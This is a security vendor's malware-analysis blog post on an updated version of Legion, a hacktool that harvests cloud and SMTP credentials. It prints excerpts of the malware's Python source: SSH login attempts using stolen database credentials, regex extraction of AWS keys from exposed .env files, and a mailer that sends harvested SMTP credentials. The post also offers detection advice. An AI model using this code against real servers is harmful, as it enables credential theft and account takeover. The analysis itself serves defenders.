Updates to Legion: A Cloud Credential Harvester and SMTP Hijacker

Cado Labs recently discovered and reported on an emerging cloud-focused hacktool, designed to harvest credentials from misconfigured web servers and leverage these credentials for email abuse. The tool was named ‘Legion’ by its developers, and was distributed and marketed in various public groups and channels within the Telegram messaging service. 

Cado researchers have now encountered what is believed to be an updated version of this commodity malware, with some additional functionality of interest to cloud security professionals.

SSH Abuse

In the sample of Legion previously analysed by Cado, the developers included code within a class named ‘legion’ to parse a list of exfiltrated database credentials and extract username and password pairs. The function then attempted to use these credentials in combination with a matching host value to log in to the host via SSH - assuming that these credentials were being reused across services. 

To achieve this within Python, the Paramiko library (a Python implementation of the SSHv2 protocol) was used. However, in the original sample of Legion, the import of Paramiko was commented-out, making the code leveraging it redundant. In Legion’s most recent update, it appears that this functionality has been enabled.

if db_user and db_pass:

	connected = 0

	ssh = paramiko.SSHClient()

	ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

	try:

		ssh.connect(host, 22, db_user, db_pass, timeout=3)

		fp = open('Results/!Vps.txt', 'a+')

		build = str(host)+'|'+str(db_user)+'|'+str(db_pass)+'\n'

		remover = str(build).replace('\r', '')

		fp.write(remover + '\n\n')

		fp.close()

		connected += 1

	except:

		pass

	finally:

		if ssh:

			ssh.close()

 Python snippet of Legion’s SSH connection code

Exploiting Additional Cloud Services

Legion’s credential gathering capabilities were discussed at length in Cado’s previous blog on the topic. Essentially, the malware hunts for environment variable files in misconfigured web servers running PHP frameworks such as Laravel. Legion attempts to access these .env files by enumerating the target server with a list of hardcoded paths in which these environment variable files typically reside. If these paths are publicly accessible, due to misconfigurations, the files are saved and a series of regular expressions are run over their contents. 

From the searches performed on the environment variable files, it’s easy to determine the services the malware attempts to retrieve credentials for. In the updated version of Legion, we can see the malware searching for credentials specific to the following services/technologies:

• DynamoDB
• Amazon CloudWatch
• AWS Owl (believed to be this project: https://github.com/ab/aws-owl)

For CloudWatch specifically, the malware searches for the environment variable CLOUDWATCH_LOG_KEY. This variable name appears in the documentation for public Laravel projects, including a project for handling CloudWatch logging in Laravel. This fits with Legion’s capabilities, as the tool’s credential harvesting feature targets Laravel apps.

elif "CLOUDWATCH_LOG_KEY" in str(text):

	if "CLOUDWATCH_LOG_KEY=" in str(text):

		method = '/.env'

		try:

		   aws_key = reg("\nCLOUDWATCH_LOG_KEY=(.*?)\n", text)[0]

		except:

			aws_key = ''

		try:

			aws_sec = reg("\nCLOUDWATCH_LOG_SECRET=(.*?)\n", text)[0]

		except:

			aws_sec = ''

		try:

			asu = legion().get_aws_region(text)

			if asu:

				aws_reg = asu

			else:

				aws_reg = ''

		except:

			aws_reg = ''

Parsing .env files for the value of CLOUDWATCH_LOG_KEY

elif "AWSOWL_ACCESS_KEY_ID" in str(text):

	if "AWSOWL_ACCESS_KEY_ID=" in str(text):

		method = '/.env'

		try:

		   aws_key = reg("\nAWSOWL_ACCESS_KEY_ID=(.*?)\n", text)[0]

		except:

			aws_key = ''

		try:

			aws_sec = reg("\nAWSOWL_SECRET_ACCESS_KEY=(.*?)\n", tex

		except:

			aws_sec = ''

		try:

			asu = legion().get_aws_region(text)

			if asu:

				aws_reg = asu

			else:

				aws_reg = ''

		except:

			aws_reg = ''

Parsing .env files for the value of AWSOWL_ACCESS_KEY_ID and AWS_OWL_SECRET_ACCESS_KEY

Miscellaneous Updates

Aside from general refactoring, the Legion developers have made some additional updates to the hacktool.

One such update is a change to the subject line of test emails sent by the malware, which now include a reference to “King Forza”. The Forza name was also used in a YouTube channel linked by Cado researchers to the operators of the Legion malware.

smtp_server = str(mailhost)

login = str(mailuser.replace('"', ''))  # paste your login generated by Mailtrap

password = str(mailpass.replace('"', '')) # paste your password generated by Mailtrap

receiver_email = emailnow

message = MIMEMultipart('alternative')

message['Subject'] = f'King Forza SMTP | {mailhost} '

message['From'] = sender_email

message['To'] = receiver_email

text = '        '

html = f" <h3>King Forza smtps! - SMTP Data for you!</h3><br>{mailhost} <br><br><h5>Mailer King with from</h5><br>==================<br><i>{mailhost}:{mailport}:{mailuser}:{mailpass}:{mailfrom}:ssl::::0:</i><br>==================<br><br><h5>Mailer king Normal</h5><br>==================<br>{mailhost}:{mailport}:{mailuser}:{mailpass}::ssl::::0:<br>==================<br><br>        "

part1 = MIMEText(text, 'plain')

part2 = MIMEText(html, 'html')

message.attach(part1)

message.attach(part2)

Snippet showing updated subject line, including Forza name

Another update included adding additional paths to enumerate for the existence of .env files. The new paths can be seen in the following table:

Conclusion

Legion is an actively developed hacktool, specifically designed to exploit vulnerable web applications in an attempt to harvest credentials. Legion focuses primarily on retrieving credentials for SMTP and SMS abuse. However this recent update demonstrates a widening of scope, with new capabilities such the ability to compromise SSH servers and retrieve additional AWS-specific credentials from Laravel web applications. It’s clear that the developer’s targeting of cloud services is advancing with each iteration.

Detection and prevention advice remains consistent with Cado’s prior blog on this malware family. Misconfigurations in web applications are still the primary method used by Legion to retrieve credentials. Therefore, it’s recommended that developers and administrators of web applications regularly review access to resources within the applications themselves, and seek alternatives to storing secrets in environment files. 

Advice to AWS users around detecting Legion activity also remains unchanged. The malware creates an IAM user and sets the tag “Owner” to the value “ms.boharas”. This is a strong indicator of compromise by the malware, and can be used for detection engineering and investigations.

Are you interested in seeing the Cado Cloud Forensics and Incident Response platform in action? Schedule a demo with our team or check out our 14-day free trial.

For more information on responding to incidents in AWS, check out our free playbook the "Ultimate Guide to Incident Response in AWS".

Indicators of Compromise (IoCs)